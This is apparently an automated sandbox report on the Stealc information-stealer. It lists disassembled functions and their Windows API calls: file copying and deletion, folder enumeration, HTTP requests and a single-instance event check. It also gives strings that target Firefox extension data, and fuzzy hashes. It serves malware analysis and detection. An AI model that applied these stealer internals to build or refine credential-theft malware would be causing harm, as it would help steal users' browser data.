Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

SetEnvironmentVariableA.KERNEL32(007FD5D8,00000000,00000000,?,00CC12D8,?,00CB0153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,00CC0AFE), ref: 00CAA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 00CAA0B2, 00CAA0C6, 00CAA0DC

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
API String ID: 2929475105-127767437
Opcode ID: eaaf822d9d2e1d26eeaeb30bad15d151a42ddab980ee0fcc246beb9b9b96bca0
Instruction ID: 53c890cea79d58288d75d0c7f6b2793a633585cb3c4a8f79cc29fceae7f0b5e5
Opcode Fuzzy Hash: eaaf822d9d2e1d26eeaeb30bad15d151a42ddab980ee0fcc246beb9b9b96bca0
Instruction Fuzzy Hash: D3414EB180124AAFCB04DFA6ECD5BAA3774B70A305F08013CF505BB2A0DB356949DB63

Function 00CAA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(?,007F4820,00CC05AE,?,?,?,?,?,?,?,?,?,00CA4963,?,00000014), ref: 00CB8B86

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAA2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 00CAA3FF
lstrlenA.KERNEL32(00000000), ref: 00CAA6BC

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA9E10: memcmp.MSVCRT ref: 00CA9E2D

DeleteFileA.KERNEL32(00000000), ref: 00CAA743

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 73317512c9dad8127d16286d438fdcaa4a49ebefc4035b1fc047b5312df7d441
Instruction ID: 1f11030b30b3056ea150c36ffdde954effadf31da93507e048f4a14e9fc64b23
Opcode Fuzzy Hash: 73317512c9dad8127d16286d438fdcaa4a49ebefc4035b1fc047b5312df7d441
Instruction Fuzzy Hash: E2E1EA72C10118AADB14FBA4DCA2EEE733CAF14300F548169F556B6491EF316A4DEB62

Function 00CAD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(?,007F4820,00CC05AE,?,?,?,?,?,?,?,?,?,00CA4963,?,00000014), ref: 00CB8B86

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAD801
lstrlenA.KERNEL32(00000000), ref: 00CAD99F
lstrlenA.KERNEL32(00000000), ref: 00CAD9B3
DeleteFileA.KERNEL32(00000000), ref: 00CADA32

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 5e4f32c1df33c61d76e3c1dc1438d82f9f6b745345a6930cbaa73122370dbd4a
Instruction ID: b9e3d538760dd27b5d1ca01e6d1c024cdc32ec9c98aeb333b1c633940faf2a32
Opcode Fuzzy Hash: 5e4f32c1df33c61d76e3c1dc1438d82f9f6b745345a6930cbaa73122370dbd4a
Instruction Fuzzy Hash: 38813172810108ABDB14FBA1DCA2EEE733CAF14300F544128F587B6491EF356A09EB62

Function 00CAF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB02E7,00000000), ref: 00CA9A5A
Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CB02E7), ref: 00CA9A90
Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A

Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CC1580,00CC0D92), ref: 00CAF54C
lstrlenA.KERNEL32(00000000), ref: 00CAF56B

Strings

moz-extension+++, xrefs: 00CAF5AD
^userContextId=4294967295, xrefs: 00CAF59C

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: f40aae9c551492b437c81f6195a98a511a659eccfdb7ed26ddd039afc4cc3463
Instruction ID: d2a52c0d35717cdbc48c8605b9998bba89f2228b4e27d08ea37752a6800ba75a
Opcode Fuzzy Hash: f40aae9c551492b437c81f6195a98a511a659eccfdb7ed26ddd039afc4cc3463
Instruction Fuzzy Hash: CE511071D10108BADB14FBF4DC96EED737CAF54300F408528F856A7591EE346A09EBA2

Function 00CB4F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00CB4F7A
lstrcatA.KERNEL32(?,00CC1070), ref: 00CB4F97
lstrcatA.KERNEL32(?,007FD478), ref: 00CB4FAB
lstrcatA.KERNEL32(?,00CC1074), ref: 00CB4FBD

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943

Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 4e8b3a555a6403355433486e2f59e6e5303cf7e4da2ad29755b1853568704f50
Instruction ID: 5780386f0087d4b7ad358bba6dc61c76c84d4197c5fd055722b0e8f2c852522c
Opcode Fuzzy Hash: 4e8b3a555a6403355433486e2f59e6e5303cf7e4da2ad29755b1853568704f50
Instruction Fuzzy Hash: 7921887AD0020CABC754FBB0DC86EE9337CA754700F04456CB659A6181EE75AACCDBA2

Function 00CB6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F1348,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
Sleep.KERNEL32(00001770), ref: 00CB6B04
CloseHandle.KERNEL32(?,00000000,?,007F1348,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
ExitProcess.KERNEL32 ref: 00CB6B22

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: dcc37704a556b12a672b30785e9bf721027e18130e36bfb546bb6737280e77f3
Instruction ID: f924487edf292413a23a6128df6d448eccec2ec1fdcac738afa29f93f6c61bde
Opcode Fuzzy Hash: dcc37704a556b12a672b30785e9bf721027e18130e36bfb546bb6737280e77f3
Instruction Fuzzy Hash: 31F05E7094021DAFEB00EBA1DC4ABFD7B38EB04701F144529F552B51C1CBB46544FA6A

Function 00CB51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA6280: InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
Part of subcall function 00CA6280: StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA6303
Part of subcall function 00CA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
Part of subcall function 00CA6280: HttpOpenRequestA.WININET(00000000,GET,?,00801770,00000000,00000000,00400100,00000000), ref: 00CA6385
Part of subcall function 00CA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
Part of subcall function 00CA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228

Strings

ERROR, xrefs: 00CB521A
ERROR, xrefs: 00CB5273

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
